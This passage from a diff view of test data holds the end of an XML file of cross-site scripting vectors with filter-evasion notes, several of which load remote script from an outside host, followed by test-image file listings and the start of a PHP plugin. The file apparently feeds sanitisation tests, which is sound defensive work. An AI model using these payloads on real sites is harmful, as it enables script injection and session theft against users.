<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Embedded Carriage Return</name>
<code>&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I&apos;ve seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Multiline w/Carriage Returns</name>
<code>&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;</code>
<desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Null Chars 1</name>
<code>perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out</code>
<desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Null Chars 2</name>
<code>perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out</code>
<desc>Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I&apos;ve seen this vector bypass some of the most restrictive XSS filters to date</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Spaces/Meta Chars</name>
<code>&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;</code>
<desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn&apos;t take into account spaces in the word &quot;javascript:&quot; - which is correct since that won&apos;t render- and makes the false assumption that you can&apos;t have a space between the quote and the &quot;javascript:&quot; keyword. The actual reality is you can have any char from 1-32 in decimal).</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Non-Alpha/Non-Digit</name>
<code>&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example &quot;&lt;SCRIPT\s&quot; != &quot;&lt;SCRIPT/XSS\s&quot;</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Non-Alpha/Non-Digit Part 2</name>
<code>&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;</code>
<desc>Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>No Closing Script Tag</name>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js</code>
<desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don&apos;t actually need the &quot;&gt;&lt;/SCRIPT&gt;&quot; portion of this Cross Site Scripting vector. Firefox assumes it&apos;s safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn&apos;t affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they&apos;re not needed generally.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Protocol resolution in script tags</name>
<code>&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;</code>
<desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh&apos;s protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a &lt;/SCRIPT&gt; tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The &quot;.j&quot; is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Half-Open HTML/JavaScript</name>
<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</code>
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
As a side note, this was also effective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG tag.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Double open angle brackets</name>
<code>&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;</code>
<desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it&apos;s surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won&apos;t</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Extraneous Open Brackets</name>
<code>&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</code>
<desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Malformed IMG Tags</name>
<code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</code>
<desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>No Quotes/Semicolons</name>
<code>&lt;SCRIPT&gt;a=/XSS/
alert(a.source)&lt;/SCRIPT&gt;</code>
<desc>No single quotes or double quotes or semicolons.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Event Handlers List 1</name>
<code>See Below</code>
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
-FSCommand() (execute from within an embedded Flash object)
-onAbort() (when user aborts the loading of an image)
-onActivate() (when object is set as the active element)
-onAfterPrint() (activates after user prints or previews print job)
-onAfterUpdate() (activates on data object after updating data in the source object)
-onBeforeActivate() (fires before the object is set as the active element)
-onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand(&quot;Copy&quot;) function)
-onBeforeCut() (attacker executes the attack string right before a selection is cut)
-onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
-onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
-onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand(&quot;Paste&quot;) function)
-onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand(&quot;Print&quot;) function)
-onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
-onBegin() (fires immediately when the element&apos;s timeline begins)
-onBlur() (in the case where another popup is loaded and window loses focus)
-onBounce() (fires when the behavior property of the marquee object is set to &quot;alternate&quot; and the contents of the marquee reach one side of the window)
-onCellChange() (fires when data changes in the data provider)
-onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified)
-onClick() (fires when someone clicks on a form)
-onContextMenu() (user would need to right click on attack area)
-onControlSelect() (fires when the user is about to make a control selection of the object)
-onCopy() (user needs to copy something or it can be exploited using the execCommand(&quot;Copy&quot;) command)
-onCut() (user needs to copy something or it can be exploited using the execCommand(&quot;Cut&quot;) command)
-onDataAvailible() (user would need to change data in an element, or attacker could perform the same function)
-onDataSetChanged() (fires when the data set exposed by a data source object changes)
-onDataSetComplete() (fires to indicate that all data is available from the data source object)
-onDblClick() (fires when user double-clicks a form element or a link)
-onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
-onDrag() (requires that the user drags an object)
-onDragEnd() (requires that the user drags an object)
-onDragLeave() (requires that the user drags an object off a valid location)
-onDragEnter() (requires that the user drags an object into a valid location)
-onDragOver() (requires that the user drags an object into a valid location)
-onDragDrop() (user drops an object (e.g. file) onto the browser window)
-onDrop() (fires when user drops an object (e.g. file) onto the browser window)
</desc>
<label>Event Handlers</label>
<browser>Browser support:</browser>
</attack>
<attack>
<name>Event Handlers List 2</name>
<code>See Below</code>
<desc>-onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like &lt;P STYLE=&quot;behavior:url(&apos;#default#time2&apos;)&quot; onEnd=&quot;alert(&apos;XSS&apos;)&quot;&gt;)
-onError() (loading of a document or image causes an error)
-onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
-onFilterChange() (fires when a visual filter completes state change)
-onFinish() (attacker could create the exploit when marquee is finished looping)
-onFocus() (attacker executes the attack string when the window gets focus)
-onFocusIn() (attacker executes the attack string when window gets focus)
-onFocusOut() (attacker executes the attack string when window loses focus)
-onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
-onKeyDown() (fires when user depresses a key)
-onKeyPress() (fires when user presses or holds down a key)
-onKeyUp() (fires when user releases a key)
-onLayoutComplete() (user would have to print or print preview)
-onLoad() (attacker executes the attack string after the window loads)
-onLoseCapture() (can be exploited by the releaseCapture() method)
-onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing)
-onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
-onMouseDown() (the attacker would need to get the user to click on an image)
-onMouseEnter() (fires when cursor moves over an object or area)
-onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
-onMouseMove() (the attacker would need to get the user to mouse over an image or table)
-onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
-onMouseOver() (fires when cursor moves over an object or area)
-onMouseUp() (the attacker would need to get the user to click on an image)
-onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
-onMove() (user or attacker would move the page)
-onMoveEnd() (user or attacker would move the page)
-onMoveStart() (user or attacker would move the page)
-onOutOfSync() (interrupt the element&apos;s ability to play its media as defined by the timeline)
-onPaste() (user would need to paste or attacker could use the execCommand(&quot;Paste&quot;) function)
-onPause() (fires on every element that is active when the timeline pauses, including the body element)
-onProgress() (attacker would use this as a flash movie was loading)
-onPropertyChange() (user or attacker would need to change an element property)
-onReadyStateChange() (user or attacker would need to change an element property)
</desc>
<label>Event Handlers</label>
<browser>Browser support:</browser>
</attack>
<attack>
<name>Event Handlers List 3</name>
<code>See Below</code>
<desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle)
-onReset() (fires when user or attacker resets a form)
-onResize() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
-onResizeEnd() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
-onResizeStart() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
-onResume() (fires on every element that becomes active when the timeline resumes, including the body element)
-onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
-onRowEnter() (user or attacker would need to change a row in a data source)
-onRowExit() (user or attacker would need to change a row in a data source)
-onRowsDelete() (user or attacker would need to delete a row in a data source)
-onRowsInserted() (user or attacker would need to insert a row in a data source)
-onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
-onSeek() (fires when the timeline is set to play in any direction other than forward)
-onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(&quot;SelectAll&quot;);)
-onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(&quot;SelectAll&quot;);)
-onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(&quot;SelectAll&quot;);)
-onStart() (fires at the beginning of each marquee loop)
-onStop() (user would need to press the stop button or leave the webpage)
-onSyncRestored() (user interrupts the element&apos;s ability to play its media as defined by the timeline to fire)
-onSubmit() (requires attacker or user submits a form)
-onTimeError() (fires when user or attacker sets a time property, such as &quot;dur&quot;, to an invalid value)
-onTrackChange() (fires when user or attacker changes track in a playList)
-onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click)
-onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
-seekSegmentTime() (locates the specified point on the element&apos;s segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
</desc>
<label>Event Handlers</label>
<browser>Browser support:</browser>
</attack>
<attack>
<name>Evade Regex Filter 1</name>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of the following regex filter:
/&lt;script[^&gt;]+src/i</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Evade Regex Filter 2</name>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of a regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
(this is an important one, because I&apos;ve seen this regex in the wild)</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Evade Regex Filter 3</name>
<code>&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Another XSS to evade this regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Evade Regex Filter 4</name>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Yet another XSS to evade the same filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
The only thing I&apos;ve seen work against this XSS attack if you still want to allow &lt;SCRIPT&gt; tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags)</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Evade Regex Filter 5</name>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>And one last XSS attack (using grave accents) to evade this regex:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Filter Evasion 1</name>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
<name>Filter Evasion 2</name>
<code>&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Here&apos;s an XSS example that bets on the fact that the regex won&apos;t catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
<label>XSS w/HTML Quote Encapsulation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
</xss>

BIN
tests/data/images/2004-07-22-DSC_0007.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 85 KiB

BIN
tests/data/images/2004-07-22-DSC_0008.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 110 KiB

BIN
tests/data/images/2007-06-17DSC_4173.JPG Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 93 KiB

BIN
tests/data/images/a2-small-100x75.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.7 KiB

BIN
tests/data/images/a2-small.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 48 KiB

BIN
tests/data/images/canola.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 198 KiB

BIN
tests/data/images/gradient-square.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.0 KiB

BIN
tests/data/images/test-image-cmyk.jpg Executable file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 12 KiB

BIN
tests/data/images/test-image-grayscale.jpg Executable file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

BIN
tests/data/images/test-image-iptc.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.1 KiB

BIN
tests/data/images/test-image-lzw.tiff Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image-mime-jpg.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.0 KiB

BIN
tests/data/images/test-image-zip.tiff Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image.bmp Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 9.8 KiB

BIN
tests/data/images/test-image.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 524 B

BIN
tests/data/images/test-image.jp2 Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.0 KiB

BIN
tests/data/images/test-image.pct Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1011 B

BIN
tests/data/images/test-image.psd Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image.sgi Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image.tga Normal file
View File

Binary file not shown.

BIN
tests/data/images/test-image.tiff Normal file
View File

Binary file not shown.

BIN
tests/data/images/transparent.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
tests/data/images/waffles.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 67 KiB

14
tests/data/plugins/hello.php Normal file
View File

@ -0,0 +1,14 @@
<?php
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/#
